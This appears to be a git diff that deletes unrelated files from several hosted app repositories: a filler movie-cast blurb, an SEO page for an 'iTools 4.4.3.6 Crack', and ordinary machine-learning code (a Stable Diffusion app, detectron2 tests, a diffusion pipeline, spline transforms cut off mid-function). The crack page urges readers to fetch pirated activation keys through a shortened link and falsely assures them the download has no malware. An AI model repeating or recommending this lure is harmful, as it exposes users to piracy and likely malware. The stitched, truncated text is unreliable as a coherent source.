          C.D. Kand is a movie that may appeal to fans of horror and drama genres, as it has some elements of suspense, mystery and social commentary. The movie has received mixed reviews from critics and audiences, with some praising its bold theme and performances, and others criticizing its low production value and poor direction.

          -

          If you are interested in watching C.D. Kand online, you can check out the official trailer on YouTube[^2^] and decide for yourself if it is worth your time. You can also read some reviews of the movie on Rotten Tomatoes[^1^] and Times of India[^3^] to get more insights into its plot and quality.

          - -

          C.D. Kand: The Cast and Crew of the Movie

          -

          C.D. Kand is a movie that features a mix of new and experienced actors and actresses. The lead roles of Gauri Devi and Mansi Rana are played by Anuya Bhagvath and Anara Gupta respectively. Anuya Bhagvath is a Tamil actress who has appeared in movies like Siva Manasula Sakthi and Nanban. Anara Gupta is a former Miss Jammu who has acted in movies like Miss Anara and Memsahab.

          -

          The other actors who have important roles in C.D. Kand are Samarth Chaturvedi, Jay Kapdia, Dhananjay Singh and Sunny Charles. Samarth Chaturvedi plays the role of a politician named Rajesh Singh, who is one of the main antagonists of the movie. Jay Kapdia plays the role of a journalist named Ravi Sharma, who helps Mansi Rana in her investigation. Dhananjay Singh plays the role of another politician named Pratap Singh, who is also involved in the scandal. Sunny Charles plays the role of Pushkar, a friend of Ravi Sharma.

          -

The movie is directed by Imtiaz Patel, who also wrote the story and produced the film along with Ajay G Shah. Imtiaz Patel is a filmmaker who has made movies like Aaj Ka Naya Khiladi and Aaj Ka Fashion Trend. The music is composed by Iqbal Darbar, who has scored movies like Hum Dil De Chuke Sanam and Tere Naam. The cinematography is by Naren Gedia, who has worked on movies like Aashiqui 2 and Murder 3, and the editing is by Imtiaz Alam, who has edited movies like Jism 2 and Ragini MMS 2.

          -

          e93f5a0c3f
          -
          -
          \ No newline at end of file diff --git a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/ITools 4.4.3.6 Crack Free Activation Key Download 2019 TOP.md b/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/ITools 4.4.3.6 Crack Free Activation Key Download 2019 TOP.md deleted file mode 100644 index 68566859200acf8add20aead69388f854f8a2f89..0000000000000000000000000000000000000000 --- a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/ITools 4.4.3.6 Crack Free Activation Key Download 2019 TOP.md +++ /dev/null @@ -1,50 +0,0 @@ - -

          iTools 4.4.3.6 Crack: A Free and Easy Way to Manage Your iOS Devices

          - -

          If you are looking for a simple and effective way to transfer and manage your files, apps, music, photos, and videos between your iOS devices and your PC or Mac, you might want to try iTools 4.4.3.6 Crack. This is a free utility that lets you access and control your iPhone, iPad, or iPod touch without using iTunes.

          -

          iTools 4.4.3.6 Crack Free Activation Key Download { 2019 }


          Download Zip ••• https://urlcod.com/2uI9GC



          - -

          iTools 4.4.3.6 Crack is compatible with all series of iOS devices and supports the latest iOS 16 version. It also works with Windows 11/10, Windows 8.1/8, Windows 7, Vista, XP, and Mac OS X. You can download it from the official website or from the link below.

          - -

          With iTools 4.4.3.6 Crack, you can enjoy many features that iTunes does not offer, such as:

          - -
            -
          • Transfer music in two ways without losing any tracks or playlists.
          • -
          • Export photos instantly from your device to your computer with one click.
          • -
          • Customize your ringtones with the built-in iTools Ringtone Maker.
          • -
          • Back up or restore data on your device with ease.
          • -
          • Simulate any location on your device with the Virtual Location feature.
          • -
          • Manage your apps, contacts, files, and more with a user-friendly interface.
          • -
          - -

iTools 4.4.3.6 Crack is a safe and reliable tool that does not require jailbreaking your device or any installation. It does not contain any viruses or malware and does not affect your device's performance. You can use it without any risk or limitation.

          - -

          To get iTools 4.4.3.6 Crack for free, you need to follow these steps:

          - -
            -
          1. Download the iTools 4.4.3.6 Crack file from the link below.
          2. -
          3. Extract the file and run the iTools.exe file.
          4. -
          5. Connect your iOS device to your computer via USB cable.
          6. -
          7. Launch iTools and enter the activation key that you will find in the crack file.
          8. -
          9. Enjoy using iTools 4.4.3.6 Crack for free!
          10. -
          - -

          iTools 4.4.3.6 Crack is a must-have tool for iOS users who want to manage their devices easily and efficiently. It is a better alternative to iTunes that gives you more freedom and flexibility. Download it now and see for yourself!

          - -

          Download iTools 4.4.3.6 Crack Free Activation Key Here

          - -

          What are the benefits of using iTools 4.4.3.6 Crack?

          - -

          iTools 4.4.3.6 Crack is a powerful and versatile tool that can help you manage your iOS devices in many ways. Here are some of the benefits of using this tool:

          -

          - -
            -
          • It saves you time and space. You don't need to install iTunes or any other software on your computer to use iTools. It also consumes less disk space and memory than iTunes.
          • -
• It gives you more control and options. You can transfer and manage your files, apps, music, photos, and videos with more flexibility and convenience than iTunes. You can also customize your ringtones, simulate your location, back up or restore your data, and more with iTools.
          • -
• It protects your privacy and security. You don't need to sign in to iTunes or with an Apple ID to use iTools. It also does not collect or share any of your personal information or data. You can use it with confidence and peace of mind.
          • -
• It supports multiple languages and devices. You can use iTools in English, Chinese, Japanese, Korean, French, German, Spanish, and more. It also supports all iPhone, iPad, and iPod touch models and all iOS versions.
          • -
          - -

          iTools 4.4.3.6 Crack is a smart and handy tool that can make your life easier and better. It is a one-stop solution for all your iOS device management needs. Try it today and see the difference!

          cec2833e83
          -
          -
          \ No newline at end of file diff --git a/spaces/nightfury/Stable_Diffusion/app.py b/spaces/nightfury/Stable_Diffusion/app.py deleted file mode 100644 index f262db49947bdbcf8de2f6e5276f504172008139..0000000000000000000000000000000000000000 --- a/spaces/nightfury/Stable_Diffusion/app.py +++ /dev/null @@ -1,57 +0,0 @@ -import gradio as gr -#import torch -#from torch import autocast // only for GPU - -from PIL import Image -import numpy as np -from io import BytesIO -import os -MY_SECRET_TOKEN=os.environ.get('HF_TOKEN_SD') - -from diffusers import StableDiffusionImg2ImgPipeline - -print("hello sylvain") - -YOUR_TOKEN=MY_SECRET_TOKEN - -device="cpu" - -#prompt_pipe = StableDiffusionPipeline.from_pretrained("CompVis/stable-diffusion-v1-4", use_auth_token=YOUR_TOKEN) -#prompt_pipe.to(device) - -img_pipe = StableDiffusionImg2ImgPipeline.from_pretrained("CompVis/stable-diffusion-v1-4", use_auth_token=YOUR_TOKEN) -img_pipe.to(device) - -source_img = gr.Image(source="upload", type="filepath", label="init_img | 512*512 px") -gallery = gr.Gallery(label="Generated images", show_label=False, elem_id="gallery").style(grid=[2], height="auto") - -def resize(value,img): - #baseheight = value - img = Image.open(img) - #hpercent = (baseheight/float(img.size[1])) - #wsize = int((float(img.size[0])*float(hpercent))) - #img = img.resize((wsize,baseheight), Image.Resampling.LANCZOS) - img = img.resize((value,value), Image.Resampling.LANCZOS) - return img - - -def infer(prompt, source_img): - - source_image = resize(512, source_img) - source_image.save('source.png') - images_list = img_pipe([prompt] * 2, init_image=source_image, strength=0.75) - images = [] - safe_image = Image.open(r"unsafe.png") - for i, image in enumerate(images_list["sample"]): - if(images_list["nsfw_content_detected"][i]): - images.append(safe_image) - else: - images.append(image) - return images - -print("Great sylvain ! Everything is working fine !") - -title="Img2Img Stable Diffusion CPU" -description="Img2Img Stable Diffusion example using CPU and HF token.
          Warning: Slow process... ~5/10 min inference time. NSFW filter enabled." - -gr.Interface(fn=infer, inputs=["text", source_img], outputs=gallery,title=title,description=description).queue(max_size=100).launch(enable_queue=True) \ No newline at end of file diff --git a/spaces/nikitaPDL2023/assignment4/detectron2/tests/data/test_sampler.py b/spaces/nikitaPDL2023/assignment4/detectron2/tests/data/test_sampler.py deleted file mode 100644 index 0d2784390801314862524e1b85703535d199e41d..0000000000000000000000000000000000000000 --- a/spaces/nikitaPDL2023/assignment4/detectron2/tests/data/test_sampler.py +++ /dev/null @@ -1,111 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import itertools -import math -import operator -import unittest -import torch -from torch.utils import data -from torch.utils.data.sampler import SequentialSampler - -from detectron2.data.build import worker_init_reset_seed -from detectron2.data.common import DatasetFromList, ToIterableDataset -from detectron2.data.samplers import ( - GroupedBatchSampler, - InferenceSampler, - RepeatFactorTrainingSampler, - TrainingSampler, -) -from detectron2.utils.env import seed_all_rng - - -class TestGroupedBatchSampler(unittest.TestCase): - def test_missing_group_id(self): - sampler = SequentialSampler(list(range(100))) - group_ids = [1] * 100 - samples = GroupedBatchSampler(sampler, group_ids, 2) - - for mini_batch in samples: - self.assertEqual(len(mini_batch), 2) - - def test_groups(self): - sampler = SequentialSampler(list(range(100))) - group_ids = [1, 0] * 50 - samples = GroupedBatchSampler(sampler, group_ids, 2) - - for mini_batch in samples: - self.assertEqual((mini_batch[0] + mini_batch[1]) % 2, 0) - - -class TestSamplerDeterministic(unittest.TestCase): - def test_to_iterable(self): - sampler = TrainingSampler(100, seed=10) - gt_output = list(itertools.islice(sampler, 100)) - self.assertEqual(set(gt_output), set(range(100))) - - dataset = DatasetFromList(list(range(100))) - dataset = ToIterableDataset(dataset, sampler) - data_loader = data.DataLoader(dataset, num_workers=0, collate_fn=operator.itemgetter(0)) - - output = list(itertools.islice(data_loader, 100)) - self.assertEqual(output, gt_output) - - data_loader = data.DataLoader( - dataset, - num_workers=2, - collate_fn=operator.itemgetter(0), - worker_init_fn=worker_init_reset_seed, - # reset seed should not affect behavior of TrainingSampler - ) - output = list(itertools.islice(data_loader, 100)) - # multiple workers should not lead to duplicate or different data - self.assertEqual(output, gt_output) - - def test_training_sampler_seed(self): - seed_all_rng(42) - sampler = TrainingSampler(30) - data = list(itertools.islice(sampler, 65)) - - seed_all_rng(42) - sampler = TrainingSampler(30) - seed_all_rng(999) # should be ineffective - data2 = list(itertools.islice(sampler, 65)) - self.assertEqual(data, data2) - - -class TestRepeatFactorTrainingSampler(unittest.TestCase): - def test_repeat_factors_from_category_frequency(self): - repeat_thresh = 0.5 - - dataset_dicts = [ - {"annotations": [{"category_id": 0}, {"category_id": 1}]}, - {"annotations": [{"category_id": 0}]}, - {"annotations": []}, - ] - - rep_factors = RepeatFactorTrainingSampler.repeat_factors_from_category_frequency( - dataset_dicts, repeat_thresh - ) - - expected_rep_factors = torch.tensor([math.sqrt(3 / 2), 1.0, 1.0]) - self.assertTrue(torch.allclose(rep_factors, expected_rep_factors)) - - -class TestInferenceSampler(unittest.TestCase): - def test_local_indices(self): - sizes = [0, 16, 2, 
42] - world_sizes = [5, 2, 3, 4] - - expected_results = [ - [range(0) for _ in range(5)], - [range(8), range(8, 16)], - [range(1), range(1, 2), range(0)], - [range(11), range(11, 22), range(22, 32), range(32, 42)], - ] - - for size, world_size, expected_result in zip(sizes, world_sizes, expected_results): - with self.subTest(f"size={size}, world_size={world_size}"): - local_indices = [ - InferenceSampler._get_local_indices(size, world_size, r) - for r in range(world_size) - ] - self.assertEqual(local_indices, expected_result) diff --git a/spaces/nosdigitalmedia/dutch-youth-comment-classifier/src/rule_based_system/Rule.py b/spaces/nosdigitalmedia/dutch-youth-comment-classifier/src/rule_based_system/Rule.py deleted file mode 100644 index 94294085451bdd910a36dad257444ee804c70b58..0000000000000000000000000000000000000000 --- a/spaces/nosdigitalmedia/dutch-youth-comment-classifier/src/rule_based_system/Rule.py +++ /dev/null @@ -1,25 +0,0 @@ -from abc import ABC - -from src.rule_based_system.Verdict import Verdict - - -class Rule(ABC): - - def get_verdict(self, comment_text: str) -> Verdict: - """ - Takes the comment text as input, tests a specific rule and returns a verdict, - which contains whether the comment is allowed according to the specific rule and - contains a list of substrings in the comment that may explain why a comment was - marked as inappropriate. - """ - pass - - def is_strict(self) -> bool: - """ - Returns True if rule can be used directly. False if results may be ambiguous. - """ - pass - - @staticmethod - def get_rule_description() -> str: - pass diff --git a/spaces/nupurkmr9/concept-ablation/concept-ablation-diffusers/model_pipeline.py b/spaces/nupurkmr9/concept-ablation/concept-ablation-diffusers/model_pipeline.py deleted file mode 100644 index cdf78270781074108c888b53cccaea39d4c7a7b0..0000000000000000000000000000000000000000 --- a/spaces/nupurkmr9/concept-ablation/concept-ablation-diffusers/model_pipeline.py +++ /dev/null @@ -1,237 +0,0 @@ -from typing import Callable, Optional - -import torch -from accelerate.logging import get_logger -from diffusers.models import AutoencoderKL, UNet2DConditionModel -from diffusers.models.cross_attention import CrossAttention -from diffusers.pipelines.stable_diffusion import StableDiffusionPipeline -from diffusers.pipelines.stable_diffusion.safety_checker import ( - StableDiffusionSafetyChecker, -) -from diffusers.schedulers.scheduling_utils import SchedulerMixin -from diffusers.utils.import_utils import is_xformers_available -from transformers import CLIPFeatureExtractor, CLIPTextModel, CLIPTokenizer - -if is_xformers_available(): - import xformers - import xformers.ops -else: - xformers = None - -logger = get_logger(__name__) - - -def set_use_memory_efficient_attention_xformers( - self, use_memory_efficient_attention_xformers: bool, attention_op: Optional[Callable] = None -): - if use_memory_efficient_attention_xformers: - if self.added_kv_proj_dim is not None: - # TODO(Anton, Patrick, Suraj, William) - currently xformers doesn't work for UnCLIP - # which uses this type of cross attention ONLY because the attention mask of format - # [0, ..., -10.000, ..., 0, ...,] is not supported - raise NotImplementedError( - "Memory efficient attention with `xformers` is currently not supported when" - " `self.added_kv_proj_dim` is defined." 
- ) - elif not is_xformers_available(): - raise ModuleNotFoundError( - ( - "Refer to https://github.com/facebookresearch/xformers for more information on how to install" - " xformers" - ), - name="xformers", - ) - elif not torch.cuda.is_available(): - raise ValueError( - "torch.cuda.is_available() should be True but is False. xformers' memory efficient attention is" - " only available for GPU " - ) - else: - try: - # Make sure we can run the memory efficient attention - _ = xformers.ops.memory_efficient_attention( - torch.randn((1, 2, 40), device="cuda"), - torch.randn((1, 2, 40), device="cuda"), - torch.randn((1, 2, 40), device="cuda"), - ) - except Exception as e: - raise e - - processor = CustomDiffusionXFormersAttnProcessor( - attention_op=attention_op) - else: - processor = CustomDiffusionAttnProcessor() - - self.set_processor(processor) - - -class CustomDiffusionAttnProcessor: - def __call__( - self, - attn: CrossAttention, - hidden_states, - encoder_hidden_states=None, - attention_mask=None, - ): - batch_size, sequence_length, _ = hidden_states.shape - attention_mask = attn.prepare_attention_mask( - attention_mask, sequence_length, batch_size) - query = attn.to_q(hidden_states) - - crossattn = False - if encoder_hidden_states is None: - encoder_hidden_states = hidden_states - else: - crossattn = True - if attn.cross_attention_norm: - encoder_hidden_states = attn.norm_cross(encoder_hidden_states) - - key = attn.to_k(encoder_hidden_states) - value = attn.to_v(encoder_hidden_states) - if crossattn: - detach = torch.ones_like(key) - detach[:, :1, :] = detach[:, :1, :] * 0. - key = detach * key + (1 - detach) * key.detach() - value = detach * value + (1 - detach) * value.detach() - - query = attn.head_to_batch_dim(query) - key = attn.head_to_batch_dim(key) - value = attn.head_to_batch_dim(value) - - attention_probs = attn.get_attention_scores(query, key, attention_mask) - hidden_states = torch.bmm(attention_probs, value) - hidden_states = attn.batch_to_head_dim(hidden_states) - - # linear proj - hidden_states = attn.to_out[0](hidden_states) - # dropout - hidden_states = attn.to_out[1](hidden_states) - - return hidden_states - - -class CustomDiffusionXFormersAttnProcessor: - def __init__(self, attention_op: Optional[Callable] = None): - self.attention_op = attention_op - - def __call__(self, attn: CrossAttention, hidden_states, encoder_hidden_states=None, attention_mask=None): - batch_size, sequence_length, _ = hidden_states.shape - - attention_mask = attn.prepare_attention_mask( - attention_mask, sequence_length, batch_size) - - query = attn.to_q(hidden_states) - - crossattn = False - if encoder_hidden_states is None: - encoder_hidden_states = hidden_states - else: - crossattn = True - if attn.cross_attention_norm: - encoder_hidden_states = attn.norm_cross(encoder_hidden_states) - - key = attn.to_k(encoder_hidden_states) - value = attn.to_v(encoder_hidden_states) - if crossattn: - detach = torch.ones_like(key) - detach[:, :1, :] = detach[:, :1, :] * 0. 
- key = detach * key + (1 - detach) * key.detach() - value = detach * value + (1 - detach) * value.detach() - - query = attn.head_to_batch_dim(query).contiguous() - key = attn.head_to_batch_dim(key).contiguous() - value = attn.head_to_batch_dim(value).contiguous() - - hidden_states = xformers.ops.memory_efficient_attention( - query, key, value, attn_bias=attention_mask, op=self.attention_op - ) - hidden_states = hidden_states.to(query.dtype) - hidden_states = attn.batch_to_head_dim(hidden_states) - - # linear proj - hidden_states = attn.to_out[0](hidden_states) - # dropout - hidden_states = attn.to_out[1](hidden_states) - return hidden_states - - -class CustomDiffusionPipeline(StableDiffusionPipeline): - r""" - Pipeline for custom diffusion model. - - This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods the - library implements for all the pipelines (such as downloading or saving, running on a particular device, etc.). - - Args: - vae ([`AutoencoderKL`]): - Variational Auto-Encoder (VAE) Model to encode and decode images to and from latent representations. - text_encoder ([`CLIPTextModel`]): - Frozen text-encoder. Stable Diffusion uses the text portion of - [CLIP](https://huggingface.co/docs/transformers/model_doc/clip#transformers.CLIPTextModel), specifically - the [clip-vit-large-patch14](https://huggingface.co/openai/clip-vit-large-patch14) variant. - tokenizer (`CLIPTokenizer`): - Tokenizer of class - [CLIPTokenizer](https://huggingface.co/docs/transformers/v4.21.0/en/model_doc/clip#transformers.CLIPTokenizer). - unet ([`UNet2DConditionModel`]): Conditional U-Net architecture to denoise the encoded image latents. - scheduler ([`SchedulerMixin`]): - A scheduler to be used in combination with `unet` to denoise the encoded image latents. - safety_checker ([`StableDiffusionSafetyChecker`]): - Classification module that estimates whether generated images could be considered offensive or harmful. - Please, refer to the [model card](https://huggingface.co/runwayml/stable-diffusion-v1-5) for details. - feature_extractor ([`CLIPFeatureExtractor`]): - Model that extracts features from generated images to be used as inputs for the `safety_checker`. - modifier_token_id: list of id of tokens related to the target concept that are modified when ablated. 
- """ - _optional_components = ["safety_checker", - "feature_extractor", "modifier_token_id"] - - def __init__( - self, - vae: AutoencoderKL, - text_encoder: CLIPTextModel, - tokenizer: CLIPTokenizer, - unet: UNet2DConditionModel, - scheduler: SchedulerMixin, - safety_checker: StableDiffusionSafetyChecker, - feature_extractor: CLIPFeatureExtractor, - requires_safety_checker: bool = True, - modifier_token_id: list = [], - ): - super().__init__(vae, - text_encoder, - tokenizer, - unet, - scheduler, - safety_checker, - feature_extractor, - requires_safety_checker) - - self.modifier_token_id = modifier_token_id - - def save_pretrained(self, save_path, parameter_group="cross-attn", all=False): - if all: - super().save_pretrained(save_path) - else: - delta_dict = {'unet': {}} - if parameter_group == 'embedding': - delta_dict['text_encoder'] = self.text_encoder.state_dict() - for name, params in self.unet.named_parameters(): - if parameter_group == "cross-attn": - if 'attn2.to_k' in name or 'attn2.to_v' in name: - delta_dict['unet'][name] = params.cpu().clone() - elif parameter_group == "full-weight": - delta_dict['unet'][name] = params.cpu().clone() - else: - raise ValueError( - "parameter_group argument only supports one of [cross-attn, full-weight, embedding]" - ) - torch.save(delta_dict, save_path) - - def load_model(self, save_path): - st = torch.load(save_path) - print(st.keys()) - if 'text_encoder' in st: - self.text_encoder.load_state_dict(st['text_encoder']) - for name, params in self.unet.named_parameters(): - if name in st['unet']: - params.data.copy_(st['unet'][f'{name}']) diff --git a/spaces/odettecantswim/vits-models-genshin/transforms.py b/spaces/odettecantswim/vits-models-genshin/transforms.py deleted file mode 100644 index 4793d67ca5a5630e0ffe0f9fb29445c949e64dae..0000000000000000000000000000000000000000 --- a/spaces/odettecantswim/vits-models-genshin/transforms.py +++ /dev/null @@ -1,193 +0,0 @@ -import torch -from torch.nn import functional as F - -import numpy as np - - -DEFAULT_MIN_BIN_WIDTH = 1e-3 -DEFAULT_MIN_BIN_HEIGHT = 1e-3 -DEFAULT_MIN_DERIVATIVE = 1e-3 - - -def piecewise_rational_quadratic_transform(inputs, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=False, - tails=None, - tail_bound=1., - min_bin_width=DEFAULT_MIN_BIN_WIDTH, - min_bin_height=DEFAULT_MIN_BIN_HEIGHT, - min_derivative=DEFAULT_MIN_DERIVATIVE): - - if tails is None: - spline_fn = rational_quadratic_spline - spline_kwargs = {} - else: - spline_fn = unconstrained_rational_quadratic_spline - spline_kwargs = { - 'tails': tails, - 'tail_bound': tail_bound - } - - outputs, logabsdet = spline_fn( - inputs=inputs, - unnormalized_widths=unnormalized_widths, - unnormalized_heights=unnormalized_heights, - unnormalized_derivatives=unnormalized_derivatives, - inverse=inverse, - min_bin_width=min_bin_width, - min_bin_height=min_bin_height, - min_derivative=min_derivative, - **spline_kwargs - ) - return outputs, logabsdet - - -def searchsorted(bin_locations, inputs, eps=1e-6): - bin_locations[..., -1] += eps - return torch.sum( - inputs[..., None] >= bin_locations, - dim=-1 - ) - 1 - - -def unconstrained_rational_quadratic_spline(inputs, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=False, - tails='linear', - tail_bound=1., - min_bin_width=DEFAULT_MIN_BIN_WIDTH, - min_bin_height=DEFAULT_MIN_BIN_HEIGHT, - min_derivative=DEFAULT_MIN_DERIVATIVE): - inside_interval_mask = (inputs >= -tail_bound) & (inputs <= tail_bound) - outside_interval_mask = 
~inside_interval_mask - - outputs = torch.zeros_like(inputs) - logabsdet = torch.zeros_like(inputs) - - if tails == 'linear': - unnormalized_derivatives = F.pad(unnormalized_derivatives, pad=(1, 1)) - constant = np.log(np.exp(1 - min_derivative) - 1) - unnormalized_derivatives[..., 0] = constant - unnormalized_derivatives[..., -1] = constant - - outputs[outside_interval_mask] = inputs[outside_interval_mask] - logabsdet[outside_interval_mask] = 0 - else: - raise RuntimeError('{} tails are not implemented.'.format(tails)) - - outputs[inside_interval_mask], logabsdet[inside_interval_mask] = rational_quadratic_spline( - inputs=inputs[inside_interval_mask], - unnormalized_widths=unnormalized_widths[inside_interval_mask, :], - unnormalized_heights=unnormalized_heights[inside_interval_mask, :], - unnormalized_derivatives=unnormalized_derivatives[inside_interval_mask, :], - inverse=inverse, - left=-tail_bound, right=tail_bound, bottom=-tail_bound, top=tail_bound, - min_bin_width=min_bin_width, - min_bin_height=min_bin_height, - min_derivative=min_derivative - ) - - return outputs, logabsdet - -def rational_quadratic_spline(inputs, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=False, - left=0., right=1., bottom=0., top=1., - min_bin_width=DEFAULT_MIN_BIN_WIDTH, - min_bin_height=DEFAULT_MIN_BIN_HEIGHT, - min_derivative=DEFAULT_MIN_DERIVATIVE): - if torch.min(inputs) < left or torch.max(inputs) > right: - raise ValueError('Input to a transform is not within its domain') - - num_bins = unnormalized_widths.shape[-1] - - if min_bin_width * num_bins > 1.0: - raise ValueError('Minimal bin width too large for the number of bins') - if min_bin_height * num_bins > 1.0: - raise ValueError('Minimal bin height too large for the number of bins') - - widths = F.softmax(unnormalized_widths, dim=-1) - widths = min_bin_width + (1 - min_bin_width * num_bins) * widths - cumwidths = torch.cumsum(widths, dim=-1) - cumwidths = F.pad(cumwidths, pad=(1, 0), mode='constant', value=0.0) - cumwidths = (right - left) * cumwidths + left - cumwidths[..., 0] = left - cumwidths[..., -1] = right - widths = cumwidths[..., 1:] - cumwidths[..., :-1] - - derivatives = min_derivative + F.softplus(unnormalized_derivatives) - - heights = F.softmax(unnormalized_heights, dim=-1) - heights = min_bin_height + (1 - min_bin_height * num_bins) * heights - cumheights = torch.cumsum(heights, dim=-1) - cumheights = F.pad(cumheights, pad=(1, 0), mode='constant', value=0.0) - cumheights = (top - bottom) * cumheights + bottom - cumheights[..., 0] = bottom - cumheights[..., -1] = top - heights = cumheights[..., 1:] - cumheights[..., :-1] - - if inverse: - bin_idx = searchsorted(cumheights, inputs)[..., None] - else: - bin_idx = searchsorted(cumwidths, inputs)[..., None] - - input_cumwidths = cumwidths.gather(-1, bin_idx)[..., 0] - input_bin_widths = widths.gather(-1, bin_idx)[..., 0] - - input_cumheights = cumheights.gather(-1, bin_idx)[..., 0] - delta = heights / widths - input_delta = delta.gather(-1, bin_idx)[..., 0] - - input_derivatives = derivatives.gather(-1, bin_idx)[..., 0] - input_derivatives_plus_one = derivatives[..., 1:].gather(-1, bin_idx)[..., 0] - - input_heights = heights.gather(-1, bin_idx)[..., 0] - - if inverse: - a = (((inputs - input_cumheights) * (input_derivatives - + input_derivatives_plus_one - - 2 * input_delta) - + input_heights * (input_delta - input_derivatives))) - b = (input_heights * input_derivatives - - (inputs - input_cumheights) * (input_derivatives - + 
input_derivatives_plus_one - - 2 * input_delta)) - c = - input_delta * (inputs - input_cumheights) - - discriminant = b.pow(2) - 4 * a * c - assert (discriminant >= 0).all() - - root = (2 * c) / (-b - torch.sqrt(discriminant)) - outputs = root * input_bin_widths + input_cumwidths - - theta_one_minus_theta = root * (1 - root) - denominator = input_delta + ((input_derivatives + input_derivatives_plus_one - 2 * input_delta) - * theta_one_minus_theta) - derivative_numerator = input_delta.pow(2) * (input_derivatives_plus_one * root.pow(2) - + 2 * input_delta * theta_one_minus_theta - + input_derivatives * (1 - root).pow(2)) - logabsdet = torch.log(derivative_numerator) - 2 * torch.log(denominator) - - return outputs, -logabsdet - else: - theta = (inputs - input_cumwidths) / input_bin_widths - theta_one_minus_theta = theta * (1 - theta) - - numerator = input_heights * (input_delta * theta.pow(2) - + input_derivatives * theta_one_minus_theta) - denominator = input_delta + ((input_derivatives + input_derivatives_plus_one - 2 * input_delta) - * theta_one_minus_theta) - outputs = input_cumheights + numerator / denominator - - derivative_numerator = input_delta.pow(2) * (input_derivatives_plus_one * theta.pow(2) - + 2 * input_delta * theta_one_minus_theta - + input_derivatives * (1 - theta).pow(2)) - logabsdet = torch.log(derivative_numerator) - 2 * torch.log(denominator) - - return outputs, logabsdet diff --git a/spaces/oguzakif/video-object-remover/FGT_codes/LAFC/data/util/mask_generators.py b/spaces/oguzakif/video-object-remover/FGT_codes/LAFC/data/util/mask_generators.py deleted file mode 100644 index 541a898a6feee551ffda029a4dd9280f2beeb421..0000000000000000000000000000000000000000 --- a/spaces/oguzakif/video-object-remover/FGT_codes/LAFC/data/util/mask_generators.py +++ /dev/null @@ -1,217 +0,0 @@ -import numpy as np -import random -from PIL import Image, ImageDraw - - -def get_video_masks_by_moving_random_stroke( - video_len, imageWidth=320, imageHeight=180, nStroke=5, - nVertexBound=[10, 30], maxHeadSpeed=15, maxHeadAcceleration=(15, 0.5), - brushWidthBound=(5, 20), boarderGap=None, nMovePointRatio=0.5, maxPiontMove=10, - maxLineAcceleration=5, maxInitSpeed=5 -): - ''' - Get video masks by random strokes which move randomly between each - frame, including the whole stroke and its control points - - Parameters - ---------- - imageWidth: Image width - imageHeight: Image height - nStroke: Number of drawed lines - nVertexBound: Lower/upper bound of number of control points for each line - maxHeadSpeed: Max head speed when creating control points - maxHeadAcceleration: Max acceleration applying on the current head point ( - a head point and its velosity decides the next point) - brushWidthBound (min, max): Bound of width for each stroke - boarderGap: The minimum gap between image boarder and drawed lines - nMovePointRatio: The ratio of control points to move for next frames - maxPiontMove: The magnitude of movement for control points for next frames - maxLineAcceleration: The magnitude of acceleration for the whole line - - Examples - ---------- - object_like_setting = { - "nVertexBound": [5, 20], - "maxHeadSpeed": 15, - "maxHeadAcceleration": (15, 3.14), - "brushWidthBound": (30, 50), - "nMovePointRatio": 0.5, - "maxPiontMove": 10, - "maxLineAcceleration": (5, 0.5), - "boarderGap": 20, - "maxInitSpeed": 10, - } - rand_curve_setting = { - "nVertexBound": [10, 30], - "maxHeadSpeed": 20, - "maxHeadAcceleration": (15, 0.5), - "brushWidthBound": (3, 10), - "nMovePointRatio": 0.5, - "maxPiontMove": 3, 
- "maxLineAcceleration": (5, 0.5), - "boarderGap": 20, - "maxInitSpeed": 6 - } - get_video_masks_by_moving_random_stroke(video_len=5, nStroke=3, **object_like_setting) - ''' - assert(video_len >= 1) - - # Initilize a set of control points to draw the first mask - mask = Image.new(mode='1', size=(imageWidth, imageHeight), color=1) - control_points_set = [] - for i in range(nStroke): - brushWidth = np.random.randint(brushWidthBound[0], brushWidthBound[1]) - Xs, Ys, velocity = get_random_stroke_control_points( - imageWidth=imageWidth, imageHeight=imageHeight, - nVertexBound=nVertexBound, maxHeadSpeed=maxHeadSpeed, - maxHeadAcceleration=maxHeadAcceleration, boarderGap=boarderGap, - maxInitSpeed=maxInitSpeed - ) - control_points_set.append((Xs, Ys, velocity, brushWidth)) - draw_mask_by_control_points(mask, Xs, Ys, brushWidth, fill=0) - - # Generate the following masks by randomly move strokes and their control points - masks = [mask] - for i in range(video_len - 1): - mask = Image.new(mode='1', size=(imageWidth, imageHeight), color=1) - for j in range(len(control_points_set)): - Xs, Ys, velocity, brushWidth = control_points_set[j] - new_Xs, new_Ys = random_move_control_points( - Xs, Ys, velocity, nMovePointRatio, maxPiontMove, - maxLineAcceleration, boarderGap - ) - control_points_set[j] = (new_Xs, new_Ys, velocity, brushWidth) - for Xs, Ys, velocity, brushWidth in control_points_set: - draw_mask_by_control_points(mask, Xs, Ys, brushWidth, fill=0) - masks.append(mask) - - return masks - - -def random_accelerate(velocity, maxAcceleration, dist='uniform'): - speed, angle = velocity - d_speed, d_angle = maxAcceleration - - if dist == 'uniform': - speed += np.random.uniform(-d_speed, d_speed) - angle += np.random.uniform(-d_angle, d_angle) - elif dist == 'guassian': - speed += np.random.normal(0, d_speed / 2) - angle += np.random.normal(0, d_angle / 2) - else: - raise NotImplementedError(f'Distribution type {dist} is not supported.') - - return (speed, angle) - - -def random_move_control_points(Xs, Ys, lineVelocity, nMovePointRatio, maxPiontMove, maxLineAcceleration, boarderGap=15): - new_Xs = Xs.copy() - new_Ys = Ys.copy() - - # move the whole line and accelerate - speed, angle = lineVelocity - new_Xs += int(speed * np.cos(angle)) - new_Ys += int(speed * np.sin(angle)) - lineVelocity = random_accelerate(lineVelocity, maxLineAcceleration, dist='guassian') - - # choose points to move - chosen = np.arange(len(Xs)) - np.random.shuffle(chosen) - chosen = chosen[:int(len(Xs) * nMovePointRatio)] - for i in chosen: - new_Xs[i] += np.random.randint(-maxPiontMove, maxPiontMove) - new_Ys[i] += np.random.randint(-maxPiontMove, maxPiontMove) - return new_Xs, new_Ys - - -def get_random_stroke_control_points( - imageWidth, imageHeight, - nVertexBound=(10, 30), maxHeadSpeed=10, maxHeadAcceleration=(5, 0.5), 